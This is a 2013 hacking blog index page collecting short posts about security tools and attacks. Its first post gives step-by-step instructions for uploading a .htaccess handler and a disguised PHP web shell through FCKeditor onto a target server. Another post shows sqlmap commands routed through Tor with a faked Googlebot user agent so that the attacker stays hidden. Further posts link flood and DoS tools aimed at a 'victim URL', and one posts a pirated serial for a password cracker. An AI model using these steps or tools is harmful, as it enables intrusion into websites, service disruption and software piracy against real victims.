Bypass all versions FCKeditor with htaccess 1.create a htaccess file (.htaccess): SetHandler application/x-httpd-php 2.Now upload this ...

Bypass all versions FCKeditor with htaccess

Friday, December 27, 2013 Sensei Fedon 0 Comments

Bypass all versions FCKeditor with htaccess
1.create a htaccess file (.htaccess):
SetHandler application/x-httpd-php
2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/t
est.html
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to
"shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.

0 comments:

When trying to exploit some website using sqlmap, its a good idea to be anonymous. Sqlmap has excellent support for using common proxies ...

Use sqlmap with tor proxy

Tuesday, December 17, 2013 Sensei Fedon 0 Comments

When trying to exploit some website using sqlmap, its a good idea to be anonymous. Sqlmap has excellent support for using common proxies or tor.
First start tor and ensure that it is running the socks5 daemon on port 9050. Then use the socks5 proxy with sqlmap as follows
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10"
The above command uses tor with type SOCKS5. The --tor option by default tries to use the HTTP proxy instead of SOCKS5. Therefor its necessary to specify the tor-type to SOCKS5.
To further improve the anonymity of the scan, use some fake user agent. Here is a quick example.
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
The above example uses a google bot kind of user agent in the http headers of the scan, further complicating the identity of the hacker.
That is pretty much of it. Enjoy hacking!!

0 comments:

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the res...

[ExploitSearch.net] Exploit / Vulnerability Search Engine

Wednesday, November 13, 2013 Sensei Fedon 0 Comments

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 


ExploitSearch.net

0 comments:

WAF-FLE is a OpenSource Console for ModSecurity, it allow the modsec admin to view and search events sent by mlogc (modsecurity event lo...

[WAF-FLE] Web application firewall: fast log and event console

Wednesday, November 13, 2013 Sensei Fedon 0 Comments


WAF-FLE is a OpenSource Console for ModSecurity, it allow the modsec admin to view and search events sent by mlogc (modsecurity event log handler).

Features:
Central event console
Support Modsecurity in “traditional” and “Anomaly Scoring”
Able to receive events sent from mlogc (in real time or in batch using mlogc-batch-load.pl)
No sensor number limit
Dashboard with recent events information
Drill down of events with filter
Every (almost) data is “clickable” to drill down the filter
Inverted filter (to filter for “all but this item”)
Filter for network (in CIDR format, x.x.x.x/22)
Raw event download
Use Mysql as database
Open Source released under GPL v2

0 comments:

Advanced Onion Router is a portable client for the OR network and is intended to be an improved alternative for Tor+Vidalia+Privoxy bund...

Advanced Onion Router

Friday, October 25, 2013 Sensei Fedon 0 Comments

Advanced Onion Router is a portable client for the OR network and is intended to be an improved alternative for Tor+Vidalia+Privoxy bundle for Windows users. Some of the improvements include UNICODE paths, support for HTTP and HTTPS proxy protocols on the same Socks4/Socks5 port with HTTP header filtering that generates fake identity-dependent headers every time the identity is changed (proxy chains are also supported), support for NTLM proxies, a User Interface that makes Tor's options and actions more accessible, local banlist for forbidden addresses, private identity isolation, a point-and-click process interceptor that can redirect connections from programs that don't support proxies, also giving them fake information about the local system and support for .onion addresses. Also, it can estimate AS paths for all circuits and prevent AS path intersections, it can restrict circuits to be built using only nodes from different countries, can change circuit lengths and more.

0 comments:

It is time to make some attacks which like ddos but from only one PC :D DecFlooder-v1.00 Hack Tools  easy to use as you see from the p...

DecFlooder-v1.00 Effective Flood Tool

Tuesday, September 24, 2013 srius 0 Comments

It is time to make some attacks which like ddos but from only one PC :D

DecFlooder-v1.00 Hack Tools 


easy to use as you see from the picture


  1. just select your connection speed 
  2. add victim URL
  3. then pust the Enjoy Button :D ( FLOOD !!!)


Download Link:

https://app.box.com/s/gzk0gbsuneixsoixss19

0 comments:

 Elite Proxy Switcher The Best Tool That I Ever Find on The Internet For Finding And Checking Huge Proxy Lists You Can Find Elite and A...

Anyone Need Free Proxy List ???

Tuesday, September 24, 2013 srius 0 Comments

 Elite Proxy Switcher


The Best Tool That I Ever Find on The Internet For Finding And Checking Huge Proxy Lists

You Can Find Elite and Anonymous Proxy Lists Easly

Download Link:

https://app.box.com/s/npn4i28sayn0fiqztvm8


0 comments:

Hi guys, today i am goint to tell you a perfect program which makes Effective DoS Attacks Easly  :D Name of the Program is DoS-Pro v 2.0 R...

It's Time to Make Huge DoS Attacks Easly **NoobFriendly

Tuesday, September 24, 2013 srius 0 Comments

Hi guys, today i am goint to tell you a perfect program which makes Effective DoS Attacks Easly  :D

Name of the Program is DoS-Pro v 2.0 RC2

It's from my personal archive :D 


Download Link :



0 comments:

Hash Console is the all-in-one command-line based tool to quickly generate more than 15 different type of hashes. It can generate ha...

Hash Console v1.5 All-in-one Command-line tool to generate hash md5, sha1, sha256, sha384, sha512, lm, ntlm, base64, crc32, rot13

Friday, September 20, 2013 Sensei Fedon 0 Comments

Hash Console is the all-in-one command-line based tool to quickly generate more than 15 different type of hashes. It can generate hash for any given file or simple text.

Hashes or checksums are used for multiple purposes including file integrity verification, encryption, password storage etc. Hash Console help you easily and quickly quickly computing the hash for given file or text.

Currently it supports following popular hash types
  • MD5 family (md2, md4, md5)
  • SHA family (sha1, sha256, sha384, sha512)
  • BASE64
  • ROT13
  • CRC32
  • ADLER32
  • HAVAL256
  • LM
  • NTLM
  • RIPEMD160
  • WHIRLPOOL
Being a command-line tool makes it ideal for automation and easy to use on remote systems.

0 comments:

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It i...

[IronWASP v0.9.6.5] Open Source Advanced Web Security Testing Platform

Friday, September 20, 2013 Sensei Fedon 0 Comments

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.

What’s new in IronWASP v0.9.6.5


IronWASP v0.9.6.5 is now available for download. Users of older versions should get an update prompt when using IronWASP. This is what you get with the new version.

  • Completely redesigned awesome new Results section
  • Support for editing, scanning and fuzzing SOAP messages
  • New active checks for Server Side Includes, Sever Side Request Forgery and Expression Language Injection
  • New passive check for JSON messages that are vulnerable to JSON hijacking
  • Significantly faster and robust parsers for XML, JSON and Multi-part messages with auto-detection support
  • Enhancements to the Payload Effect Analysis feature
  • Enhancements to the Scan Trace Viewer feature
  • Ability to create Request in Manual Testing section from clipboards
  • New Network address parsing APIs
  • Update to FiddlerCore v2.4.4.8

0 comments:

Today, I’m gonna share to you an easy way to break your Winrar Password. You can use this method in case you forget your Winrar Password ...

How to Crack Rar Passwords

Friday, September 20, 2013 srius 0 Comments

Today, I’m gonna share to you an easy way to break your Winrar Password. You can use this method in case you forget your Winrar Password or download a Winrar File which you do not know the password. Good Luck With Passwords :)

Serial : ARCHPR-TBHW5SSMYGQS-3KQ2E6E9CU4S4BMN

0 comments:

To hide IP some of us use Anonymizers(anonymity server) , some use Proxy Servers . But VPN's(Virtual Private Network) are most ...

How to Hide Your IP Address

Friday, September 20, 2013 srius 0 Comments



To hide IP some of us use Anonymizers(anonymity server) , some use Proxy Servers .



But VPN's(Virtual Private Network) are most trusted way of hiding online even secure than proxy servers and anonymity servers. Today i will tell you the best VPN on the world :)

http://privitize.com/get/privitize


PrivitizeVPN servers are run by ThePirateBay. No connection or traffic logs are kept

You can do what you want while using PrivitizeVPN , all anonymously

Good Surfing on the internet anonymously :)

0 comments:

Do you have a website or a blog? Would you like to receive instant alerts as soon as your site goes down or becomes inaccessible to users? ...

Monitor your Website’s Uptime with Google Docs

Thursday, September 05, 2013 Sensei Fedon 0 Comments

Do you have a website or a blog? Would you like to receive instant alerts as soon as your site goes down or becomes inaccessible to users? Would you like these alerts to arrive in your email inbox or as text messages on your mobile phone or both?
Most website owners use “freemium” website monitoring services to track the downtime and uptime of their sites.  These service offer free plans but you often have to upgrade for unlimited email /SMS alerts or if you would like to monitor a large number of websites.
Website Monitor with SMS Alerts
Build your own website monitoring tool with Google Docs, SMS alerts included

0 comments:

This is how cracked wpa2 passwords...

Cracking WPA & WPA2 key with Reaver on Kali Linux (Without Dictionary attack)

Tuesday, August 20, 2013 Sensei Fedon 0 Comments

This is how cracked wpa2 passwords...


0 comments: